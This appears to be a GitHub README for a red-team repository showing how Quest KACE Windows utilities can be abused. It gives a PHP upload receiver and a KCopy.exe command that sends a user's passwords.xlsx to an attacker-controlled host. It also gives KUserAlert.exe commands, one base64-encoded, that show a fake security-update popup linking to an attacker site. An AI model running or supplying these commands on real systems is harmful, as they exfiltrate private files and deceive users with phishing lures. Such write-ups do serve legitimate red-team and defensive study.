Skip to content

billchaison/kace-abuse

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

kace-abuse

Using KACE (Quest) Windows utilities for Red Teaming.

Two examples of abusing KACE command line utilities. The first example leverages KCopy.exe to upload a file to a remote web server through HTTP PUT. The second example leverages KUserAlert.exe to produce a popup alert on the user's desktop, prompting them to click on a malicious link.

Uploading a file
Create an upload page on your attacking web server to receive the file. This example uses PHP recv_file.php.

<?php
$fl = fopen('/php_upload_path/recv_file.out', 'w');
$pd = fopen("php://input", "r");
while ($d = fread($pd, 1024))
   fwrite($fl, $d);
fclose($fl);
fclose($pd);
?>

Execute the KACE utility to upload a file.

"C:\Program Files (x86)\Quest\KACE\KCopy.exe" %USERPROFILE%\Documents\passwords.xlsx https://attacker.site/recv_file.php

alt text

Creating a popup message

"C:\Program Files (x86)\Quest\KACE\KUserAlert.exe" -name="IMPORTANT MESSAGE" -message="Your computer is missing critical security updates. Click here to install them as soon as possible, https://attacker.site" -title="Mandatory Software Patches Required" -ok

alt text

alt text

For multi-line messages use base64 encoding between !ENC! markers.

"C:\Program Files (x86)\Quest\KACE\KUserAlert.exe" -name="IMPORTANT MESSAGE" -message=!ENC!WW91ciBjb21wdXRlciBpcyBtaXNzaW5nIGNyaXRpY2FsIHNlY3VyaXR5IHVwZGF0ZXMuCgpDbGljayBoZXJlIHRvIGluc3RhbGwgdGhlbSBhcyBzb29uIGFzIHBvc3NpYmxlLgoKaHR0cHM6Ly9hdHRhY2tlci5zaXRl!ENC! -title="Mandatory Software Patches Required" -ok

alt text

About

Using KACE (Quest) Windows utilities for Red Teaming.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors